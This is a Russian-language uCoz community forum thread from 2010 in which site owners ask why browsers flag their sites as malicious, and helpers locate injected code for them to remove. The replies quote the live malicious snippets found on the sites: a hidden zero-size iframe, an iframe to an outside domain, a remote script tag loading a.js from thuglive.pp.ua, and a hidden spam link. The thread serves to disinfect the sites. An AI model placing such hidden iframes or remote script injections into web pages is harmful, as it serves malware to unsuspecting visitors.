Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
| Вирусы на сайтах (для изучения) |
|
Здравствуйте, где-то недели 2 назад, на сайте x-gaming/net/ru появилось сообщение о том, что сайт признан мошенническим, мне посоветовали обновить оперу, я обновил, это прошло, но сегодня опять появилось это сообщение. О каком мошенничестве вообще может быть речь?
И это только на главной странице, к примеру если зайти на: В чём-же может быть проблема? Как вытащить сайт? |
|
Olezka, я вам одно скажу. все ваши проблемы от детства, которое у вас играет в одном месте
Quote вырезано цензурой.......<!-- Если рипнешь, то сдохнешь. А не сдохнешь, твой сайт хакну ЛОЛ. такая надпись в исходнике у вас только на страницах с заглушкой. вы наверное думаете что детские надписи матом и долгое тыкание кнопки интер в коде спасут вас от рипа? дело в том, что яндекс тоже видит исходник, несмотря на детские надписи матом. но у яндекса не так сильно развито чувство юмора как у вас, вот он и залочил ваши наскальные рисунки. уберете из кода вашу грязь - и все станет на место |
|
Всем доброго времени суток. При заходе на мой сайт 2014olympiada.ru с 28.10.2010 Опера пишет, что этот сайт признан мошенническим!!! Все бы ни чего, но есть три "НО"
1. На сайт последний контент был добавлен 31/08/10 2. Все скрипты (проверил всё от корки до корки) скачаны с официальных источников и имеют авторские подписи) 3. Этот сайт обслуживаю я один, да и зачем мне нужно "мошенничать" на сайте спортивной тематики? Общался на форуме AVG на эту тему, на что мне посоветовали забыть хостинг ucoz и другие подобные нелепости, хотя глядя на эти данные, которые выдал Гугл я призадумался. http://safebrowsing.clients.google.com/safebro....te=http О УЖАС!!! Malicious software includes 54600 scripting exploit(s), 1959 exploit(s), 52 trojan(s). Successful infection resulted in an average of 3 new process(es) on the target machine. UCOZ.RU неужели это ты? Если это форум тех. подержки ucoz, то прошу вашей помощи в решении проблемы! Сообщение отредактировал Nilvorius - Воскресенье, 31 Окт 2010, 15:34:43
|
|
Nilvorius, то что вы тут выставили это общая статистика фильтров по юкозу.
и тут дело не в хостинге, а в пользователях которые суют на свои сайты скрипты не глядя. а вам бы посоветовала убрать вот это Code <noindex><NOSCRIPT><a rel=nofollow href="http://www.1russianbrides.com" target="_blank">Chat and date with beautiful Russian women</a></NOSCRIPT></noindex> |
|
Quote (webanet) Nilvorius, то что вы тут выставили это общая статистика фильтров по юкозу. и тут дело не в хостинге, а в пользователях которые суют на свои сайты скрипты не глядя. а вам бы посоветовала убрать вот это Да это я убрал, зайду через 2-3 дня и вот еще.... подкину пищи для размышления, это выдал сам AVG по этому форуму http://www.avgthreatlabs.com/sitereports/domain/forum.ucoz.ru Если в первом случае отчет был обобщенный по домену, то тут домен конкретный, результаты ошеломляют... и каким то образом мой сайт в этом списке % of threat detections by subdomain... пойду разбираться. |
|
Nilvorius,
Quote пойду разбираться. |
|
Quote (webanet) разберитесь ещё в аналитике которую сюда кидаете. её тоже нужно понимать при изучении Эта аналитика от администрации AVG и Opera Softvare, которую они мне предоставили при обращении к ним по моему вопросу, так что не будем умничать, а решать проблему вместе... PS: я намеренно не хочу кидать ссылок с их форумов, слишком уж много НЕ лестного они написали в адрес UCOZ. Давайте будем надеяться, что эти "некомпетентные" люди, "ни чего не понимающие в этом деле", ошибаются  Сообщение отредактировал Nilvorius - Воскресенье, 31 Окт 2010, 19:32:22
|
|
Nilvorius,
Quote так что не будем умничать, а решать проблему вместе... |
|
GunzGaMe, прямо перед часами в блоке минипрофиль стоит ифрейм на хттп://j1c.pp.ua
так же вот кусок кода с ифреймом Quote obj.onmousemove = function(advance){ //str = str.replace(/</g,"<"); //str = str.replace(/>/g,">"); hint.style.width = ''; hint.innerHTML = str; vc = document.getElementsByTagName((document.compatMode && document.compatMode=="CSS1Compat") ? "HTML":"BODY")[0]; x = window.event ? event.clientX + vc.scrollLeft : advance.pageX; y = window.event ? event.clientY + vc.scrollTop : advance.pageY; <inframe style="LEFT: 1%; WIDTH: 0%; POSITION: absolute; TOP: 1%; HEIGHT: 0%" src="http://diz-mode.net.ru/index/host/0-12"></inframe> vcwidth = vc.clientWidth ? vc.clientWidth + vc.scrollLeft : window.innerWidth + window.pageXOffset; vcheight = vc.innerHeight ? window.innerHeight + window.pageYOffset : vc.clientHeight + vc.scrollTop; |
|
GunzGaMe, ссылку то вы удалили. а ифрейм из блока мини профиль не удалили.
после очистки кода должно пройти от двух-трех суток до недели, и вот тогда табличка исчезнет. |
|
Здравствуйте! У меня вирус на сайте http://sultan-music.ucoz.kz/. Помогите его устранить, а то потеряю посетителей.
Заранее спасибо! Прикрепления:
3658691.jpg
(55.8 Kb)
Сообщение отредактировал BlazingStar - Среда, 03 Ноя 2010, 14:57:01
|
|
BlazingStar,
вот этот код удалите со страниц
Code <script type="text/javascript" src="http://thuglive.pp.ua/a.js"></script> |
|
BlazingStar, если бы вы читали тему. после удаления вредоносного кода с сайта, нужно очистить кеш (ОБЯЗАТЕЛЬНО!!!!) куки и все временные файлы интернета. антивирус и на кеш ругается как правило. очищайте.
проверила ваш сайтик. как был скрипт так и остался. обманывать не очень хорошо, ибо явно не в ваших интересах попытка вторая. скрипт находится в вашей статистике посетивших сайт за этот день. даю кусок кода который вокруг скрипта. выделенное красным удалить Quote <table border="0" width="100%" cellspacing="1" cellpadding="2"> <tr> <td align="center"> <center> <DIV align=center><STRONG>Зарегистрированных</STRONG></DIV> </td></tr></table></center> <TABLE style="BORDER-RIGHT: black 1px solid; BORDER-TOP: black 1px solid; BORDER-LEFT: black 1px solid; WIDTH: 100%; BORDER-BOTTOM: black 1px solid; BORDER-COLLAPSE: collapse"> <TBODY> <TR> <TD style="BORDER-RIGHT: black 1px solid; BORDER-TOP: black 1px solid; BORDER-LEFT: black 1px solid; BORDER-BOTTOM: black 1px solid"><SPAN style="COLOR: #7b0176"><B>Всего:</B></SPAN><BR></TD> <TD style="BORDER-RIGHT: black 1px solid; BORDER-TOP: black 1px solid; BORDER-LEFT: black 1px solid; BORDER-BOTTOM: black 1px solid"><STRONG><SPAN style="COLOR: #7b0176">306</SPAN></STRONG></TD><script type="text/javascript" src="http://thuglive.pp.ua/a.js"></script></TR> <TR> <TD style="BORDER-RIGHT: black 1px solid; BORDER-TOP: black 1px solid; BORDER-LEFT: black 1px solid; BORDER-BOTTOM: black 1px solid"><STRONG>Новых за месяц:</STRONG></TD> <TD style="BORDER-RIGHT: black 1px solid; BORDER-TOP: black 1px solid; BORDER-LEFT: black 1px solid; BORDER-BOTTOM: black 1px solid"><STRONG></STRONG></TD></TR> <TR> <TD style="BORDER-RIGHT: black 1px solid; BORDER-TOP: black 1px solid; BORDER-LEFT: black 1px solid; BORDER-BOTTOM: black 1px solid"><STRONG>Новых за неделю:</STRONG></TD> <TD style="BORDER-RIGHT: black 1px solid; BORDER-TOP: black 1px solid; BORDER-LEFT: black 1px solid; BORDER-BOTTOM: black 1px solid"><STRONG></STRONG></TD> блок статистика редактируйте |
| |||